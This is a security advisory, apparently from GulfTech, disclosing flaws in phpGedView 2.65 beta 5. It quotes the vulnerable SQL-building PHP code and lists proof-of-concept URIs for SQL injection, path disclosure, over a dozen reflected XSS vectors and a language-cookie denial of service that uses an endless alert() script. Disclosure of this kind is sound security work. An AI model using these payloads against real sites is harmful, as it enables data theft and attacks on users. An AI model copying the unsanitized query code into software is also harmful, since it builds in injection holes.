Vendor : phpGedView URL : http://phpgedview.sourceforge.net Version : 2.65 beta 5 > All Versions(??) Risk : Multiple Vulnerabilities Description: The phpGedView project parses GEDCOM 5.5 genealogy files and displays them on the Internet in a format similar to PAF. All it requires to run is a php enabled web server and a gedcom file. It is easily customizable for use on many different web sites. It is one of the top 10 most popular projects at SourceForge. SQL Injection Vulnerability: phpGedView has a few files which are vulnerable to SQL injection. The vulnerable files are "timeline.php" and "placelist.php" The vulnerabilities are a result of input not being properly validated. The data given to these scripts are then executed by the "functions_mysql.php" file. As we can see below the $parent_id variable as well as the $level variable is passed directly into the query without being sanitized by the script at all in the "get_place_list()" function. -----[ Begin Code ] ----------------------------------------------------------------- //-- find all of the places function get_place_list() { global $numfound, $j, $level, $parent, $found; global $GEDCOM, $TBLPREFIX, $placelist, $positions; // --- find all of the place in the file if ($level==0) $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=0 AND p_file='$GEDCOM' ORDER BY p_place"; else { $psql = "SELECT p_id FROM ".$TBLPREFIX."places WHERE p_level=".($level-1) ." AND p_place LIKE '".$parent[$level-1]."' AND p_file='$GEDCOM' ORDER BY p_place"; $res = dbquery($psql); $row = mysql_fetch_row($res); $parent_id = $row[0]; $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=$level AND p_parent_id=$parent_id AND p_file='$GEDCOM' ORDER BY p_place"; } $res = dbquery($sql); while ($row = mysql_fetch_row($res)) { $placelist[] = stripslashes($row[0]); $numfound++; } } ------------------------------------------------------------------------------------- Below are some URI's which can be used to exploit the issue explained in the paragraph above. Also included is a URI that triggers a somewhat similar SQL vulnerability in the "timeline.php" script. /placelist.php?level=1[Evil_Query] /placelist.php?level=1&parent[0]=[Evil_Query] /placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query] /timeline.php?pids=[Evil_Query] Path Disclosure Vulnerability: There are a decent number of ways an attacker could disclose the full path of the web server, thus aiding in the information gathering process preceding an attack. Below are a list of the vulnerable scripts and proof of concept URI's to reproduce the condition. /indilist.php?alpha=\&surname_sublist=\ /famlist.php?alpha=(&surname_sublist=yes&surname=\ /placelist.php?level=1&parent[Blah]= /imageview.php?zoomval=blah /imageview.php?filename=/ /timeline.php?pids[Blah]= /clippings.php?action=add&id=Blah /login.php?action=login /login.php?&changelanguage=yes&NEWLANGUAGE=Blah /gdbi.php?action=connect&username=Blah Cross Site Scripting: I have found over a dozen instances of Cross Site Scripting in phpGedView, but there is probably more. The impact of these vulnerabilities are self explanatory; they allow code execution in the context of the browser of someone viewing the malicious URI. Below are examples of the numerous XSS vulns. /descendancy.php?pid=<iframe> /index.php?rootid="><iframe> /individual.php?pid="><iframe> /login.php?url=/index.php?GEDCOM="><iframe> /relationship.php?path_to_find="><iframe> /relationship.php?path_to_find=0&pid1="><iframe> /relationship.php?path_to_find=0&pid1=&pid2="><iframe> /source.php?sid=<iframe> /imageview.php?filename=<iframe> /calendar.php?action=today&day=1&month=jan&year="><iframe> /calendar.php?action=today&day=1&month=<iframe> /calendar.php?action=today&day=<iframe> /gedrecord.php?pid=<iframe> /login.php?action=login&username="><iframe> /login.php?&changelanguage=yes&NEWLANGUAGE=<iframe> /gdbi_interface.php?action=delete&pid=<iframe> Denial Of Service: It is also possible for an attacker to launch a DoS of sorts against a user who visits a certain URI. The vulnerability is in the language variable not being properly validated. If an attacker sends the following URI to a victim, they will not be able to access the phpGedView web site until they either clear their cookies, or manually reset the language settings by typing in a valid URI to reset the language back to something acceptable. The phpGedView website will not be able to be viewed by the victim until then. /login.php?&changelanguage=yes&NEWLANGUAGE=[Junk_Here] Or even one hundred million times more annoying is this :P /index.php?&changelanguage=yes&NEWLANGUAGE=<script>var i=1; while(i){alert(i);};</script> As I mentioned before though, it is possible to regain a normal session by manually typing in a value in the language variable that is acceptable to phpGedView. Solution: These vulnerabilities have been addressed in the latest beta release. Users may obtain the latest beta version at http://sourceforge.net/project/showfiles.php?group_id=55456 Credits: Credits go to JeiAr of the GulfTech Security Research Team. http://www.gulftech.org
